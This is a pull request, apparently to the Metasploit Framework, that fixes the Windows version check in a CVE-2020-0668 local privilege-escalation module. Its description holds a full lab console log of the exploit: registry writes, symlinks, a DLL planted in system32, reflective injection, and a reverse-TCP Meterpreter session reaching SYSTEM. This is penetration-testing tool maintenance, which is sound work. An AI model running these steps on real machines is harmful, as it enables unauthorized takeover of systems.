### PR TITLE
Fix version check for cve-2020-0668 Service Tracing

### DIFF
--- a/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
+++ b/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb
@@ -261,7 +261,6 @@ class MetasploitModule < Msf::Exploit::Local
 
     # start file copy
     rastapi_privileged_filecopy(payload_dll, exploit_dir, upload_payload_pathname, target_payload_pathname)
-
     # launch trigger
     launch_dll_trigger
     print_warning("Manual cleanup after reboot required for #{target_payload_pathname} and #{exploit_dir}")
@@ -285,8 +284,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     version_info = get_version_info
-    vprint_status("Version: #{version_info.number}")
-    unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
+    unless version_info.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17134-18363')
     end
   end


### PR DESCRIPTION
Fixes https://github.com/rapid7/metasploit-framework/issues/19588

This fixes a regression that crept in when we updated Windows Versioning a while back.

Versioning is particularly finicky on this one.  I wasted a LOT of time trying to figure out why this failed on a VM I *thought* should be vulnerable.

```
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (267854 bytes) to 10.5.132.167
[*] Meterpreter session 1 opened (10.5.135.201:6789 -> 10.5.132.167:49741) at 2024-12-12 17:02:54 -0600

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2020_0668_service_tracing 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2020_0668_service_tracing) > show options

Module options (exploit/windows/local/cve_2020_0668_service_tracing):

   Name                   Current Setting  Required  Description
   ----                   ---------------  --------  -----------
   EXPLOIT_DIR                             no        The directory to create for mounting (%TEMP%\%RAND% by default).
   OVERWRITE_DLL          false            yes       Overwrite WindowsCreDeviceInfo.dll if it exists (false by default).
   PAYLOAD_UPLOAD_NAME                     no        The filename to use for the payload binary (%RAND% by default).
   PHONEBOOK_UPLOAD_NAME                   no        The name of the phonebook file to trigger RASDIAL (%RAND% by default).
   SESSION                                 yes       The session to run this module on


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2020_0668_service_tracing) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(windows/local/cve_2020_0668_service_tracing) > set lport 5485
lport => 5485
msf6 exploit(windows/local/cve_2020_0668_service_tracing) > set verbose true
verbose => true
msf6 exploit(windows/local/cve_2020_0668_service_tracing) > set session 1
session => 1
msf6 exploit(windows/local/cve_2020_0668_service_tracing) > run
[*] Started reverse TCP handler on 10.5.135.201:5485 
[*] Attempting to PrivEsc on DESKTOP-D1E425Q via session ID: 1
[*] Payload DLL is 9216 bytes long
[*] Registry hash = [{:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"EnableFileTracing", :value_type=>"REG_DWORD", :value_value=>1, :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"FileDirectory", :value_type=>"REG_EXPAND_SZ", :value_value=>"C:\\Users\\msfuser\\AppData\\Local\\Temp\\SlBRilYGbXv", :delete_on_cleanup=>false}, {:key_name=>"HKLM\\SOFTWARE\\Microsoft\\Tracing\\RASTAPI", :value_name=>"MaxFileSize", :value_type=>"REG_DWORD", :value_value=>9215, :delete_on_cleanup=>false}]
[*] Making C:\Users\msfuser\AppData\Local\Temp\SlBRilYGbXv on DESKTOP-D1E425Q
[*] Creating directory C:\Users\msfuser\AppData\Local\Temp\SlBRilYGbXv
[*] C:\Users\msfuser\AppData\Local\Temp\SlBRilYGbXv created
[*] Made C:\Users\msfuser\AppData\Local\Temp\SlBRilYGbXv
[*] Creating mountpoint
[+] Successfully opened C:\Users\msfuser\AppData\Local\Temp\SlBRilYGbXv
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\kMPRTgbLI.dll
[*] Payload md5 = c7c3f666f5c543a148beae0b4e79f932
[*] Creating Symlinks
[*] Creating symlink C:\Users\msfuser\AppData\Local\Temp\kMPRTgbLI.dll in \RPC Control\RASTAPI.LOG
[*] Collected Symlink Handle 692
[*] Creating symlink C:\Windows\system32\WindowsCoreDeviceInfo.dll in \RPC Control\RASTAPI.OLD
[*] Collected Symlink Handle 740
[*] Writing EnableFileTracing to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing FileDirectory to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Writing MaxFileSize to HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI
[*] Uploading phonebook to DESKTOP-D1E425Q as C:\Users\msfuser\AppData\Local\Temp\ecQubauMUcI.pbk from /home/tmoose/rapid7/metasploit-framework/data/exploits/cve-2020-0668/phonebook.txt
[*] Phonebook uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\ecQubauMUcI.pbk
[*] Launching Rasdialer
[*] Running Rasdialer with phonebook C:\Users\msfuser\AppData\Local\Temp\ecQubauMUcI.pbk
[*] Connecting to VPNTEST...

Remote Access error 807 - The network connection between your computer and the VPN server was interrupted.  This can be caused by a problem in the VPN transmission and is commonly the result of internet latency or simply that your VPN server has reached capacity.  Please try to reconnect to the VPN server.  If this problem persists, contact the VPN administrator and analyze quality of network connectivity.

For more help on this error:
	Type 'hh netcfg.chm'
	In help, click Troubleshooting, then Error Messages, then 807
[*] Checking on C:\Windows\system32\WindowsCoreDeviceInfo.dll
[*] Upload payload md5 = c7c3f666f5c543a148beae0b4e79f932
[*] Moved payload md5 = c7c3f666f5c543a148beae0b4e79f932
[*] Cleaning up before triggering dll load...
[*] Removing Registry keys
[*] Deleting EnableFileTracing from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting FileDirectory from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Deleting MaxFileSize from HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI key
[*] Removing Symlinks
[*] Closing symlink handle 692: The operation completed successfully.
[*] Closing symlink handle 740: The operation completed successfully.
[*] Removing Mountpoint
[*] Removing directories
[*] Triggering the Reflective DLL injection and running the LPE DLL...
[*] Launching netsh to host the DLL...
[+] Process 6720 launched.
[*] Reflectively injecting the DLL into 6720...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[!] Manual cleanup after reboot required for C:\Windows\system32\WindowsCoreDeviceInfo.dll and C:\Users\msfuser\AppData\Local\Temp\SlBRilYGbXv
[*] Exploit complete.  It may take up to 10 minutes to get a session
[*] Sending stage (203846 bytes) to 10.5.132.167
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\kMPRTgbLI.dll
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\ecQubauMUcI.pbk
[*] Meterpreter session 2 opened (10.5.135.201:5485 -> 10.5.132.167:49782) at 2024-12-12 17:10:28 -0600

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

```